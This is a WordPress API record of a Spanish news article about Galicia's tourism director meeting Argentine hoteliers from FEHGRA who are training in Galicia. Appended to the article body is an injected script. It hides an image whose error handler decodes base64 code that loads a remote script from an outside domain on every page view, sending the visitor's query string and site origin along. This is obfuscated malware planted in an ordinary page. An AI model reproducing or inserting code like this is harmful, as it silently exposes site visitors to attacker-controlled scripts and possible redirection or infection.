{"id":6736,"date":"2023-05-09T11:20:31","date_gmt":"2023-05-09T14:20:31","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6736"},"modified":"2025-08-13T16:00:36","modified_gmt":"2025-08-13T19:00:36","slug":"fehgra-la-directora-de-turismo-de-galicia-se-reunio-con-los-hoteleros-que-se-capacitan-en-espana","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6736","title":{"rendered":"FEHGRA: La directora de Turismo de Galicia se reuni\u00f3 con los Hoteleros que se capacitan en Espa\u00f1a"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Nava Castro mantuvo una reuni\u00f3n con la delegaci\u00f3n de argentinos que est\u00e1n haciendo el Curso de Gesti\u00f3n Hotelera, en el Centro Superior de Hosteler\u00eda de Galicia.<\/em><\/h4>\n\n\n\n<p>La directora de Turismo de Galicia, Nava Castro, agradeci\u00f3 a las autoridades de la Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina (FEHGRA) por haber elegido a Galicia, Espa\u00f1a, y al Centro Superior de Hosteler\u00eda de Galicia (CSHG) para llevar a cabo el Curso de \u201cGesti\u00f3n Hotelera para Empresarios\u201d, en el que se est\u00e1n capacitando 45 hoteleros argentinos.<\/p>\n\n\n\n<p>Ayer, en la Sala de Conferencias del Centro, Nava Castro dijo: \u201cEspero que est\u00e9n aprovechando al m\u00e1ximo y que puedan sacarle gran provecho para el trabajo diario. Contamos con los mejores profesores, con unas excelentes instalaciones y, fuera de las dependencias del Centro, como ya pudieron ver estos d\u00edas, tenemos lugares que siempre sorprenden por su espectacular belleza, sus paisajes inmejorables y, por supuesto, nuestra excelente gastronom\u00eda\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-6698\" width=\"558\" height=\"279\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 558px) 100vw, 558px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Publicidad:<\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Galicia es uno de los destinos m\u00e1s atractivos del mundo. La actividad tur\u00edstica representa el 12% del PBI gallego.<\/p>\n\n\n\n<p>La delegaci\u00f3n de FEHGRA est\u00e1 encabezada por el vicepresidente Claudio Aguilar y el secretario Jos\u00e9 Luis Recchia, quienes expresaron que es la tercera vez que la Federaci\u00f3n, entidad comprometida con la mejora y el profesionalismo del sector, elige Galicia para la formaci\u00f3n de sus asociados hoteleros. Destacaron el nivel acad\u00e9mico del Centro, que ofrece no solo clases te\u00f3ricas, sino tambi\u00e9n visitas a establecimientos tur\u00edsticos gallegos y visitas guiadas a diferentes puntos tur\u00edsticos.<\/p>\n\n\n\n<p>Las autoridades de FEHGRA, junto a dirigente patag\u00f3nica Georgina Frutos, se reunieron con la directora del CSHG, Marta Fern\u00e1ndez, y la responsable Departamento de Formaci\u00f3n Continua, Nuria S\u00e1nchez, para seguir analizando distintas herramientas para la formaci\u00f3n empresaria.<\/p>\n\n\n\n<p>Con una duraci\u00f3n de 50 horas, el Curso es una iniciativa del Departamento de Capacitaci\u00f3n y Formaci\u00f3n Profesional, a cargo de la protesorera Bel\u00e9n Garc\u00eda Bertone. Del 3 al 13 de mayo, se imparte la actualizaci\u00f3n de modelos en materia de direcci\u00f3n y gesti\u00f3n, con el desarrollo de temas financieros, recursos humanos, sostenibilidad, comunicaci\u00f3n, innovaci\u00f3n, tendencias, entre otros. La delegaci\u00f3n de FEHGRA ya visit\u00f3 el Hostal Dos Reis Cat\u00f3licos, considerado el hotel m\u00e1s antiguo de Espa\u00f1a; y el Restaurante Pepe Vieira, con dos estrellas Michel\u00edn y una estrella verde -que premia a establecimientos sostenibles-.<\/p>\n\n\n\n<p><em>En la foto, Claudio Aguilar, Nava Castro y Jos\u00e9 Luis Recchia.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.fehgra.org.ar\/archivos\/13017\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_9-5-2023_111619_www.fehgra.org_.ar_.jpeg\" alt=\"\" class=\"wp-image-6737\" width=\"270\" height=\"101\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_9-5-2023_111619_www.fehgra.org_.ar_.jpeg 497w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_9-5-2023_111619_www.fehgra.org_.ar_-300x112.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_9-5-2023_111619_www.fehgra.org_.ar_-320x119.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_9-5-2023_111619_www.fehgra.org_.ar_-480x179.jpeg 480w\" sizes=\"(max-width: 270px) 100vw, 270px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Nava Castro mantuvo una reuni\u00f3n con la delegaci\u00f3n de argentinos que est\u00e1n haciendo el Curso de Gesti\u00f3n Hotelera, en el Centro Superior de Hosteler\u00eda de Galicia. La directora de Turismo de Galicia, Nava Castro, agradeci\u00f3 a las autoridades de la Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina (FEHGRA) por haber elegido a Galicia, Espa\u00f1a, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6738,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-6736","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6736"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6736\/revisions"}],"predecessor-version":[{"id":10406,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6736\/revisions\/10406"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6738"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}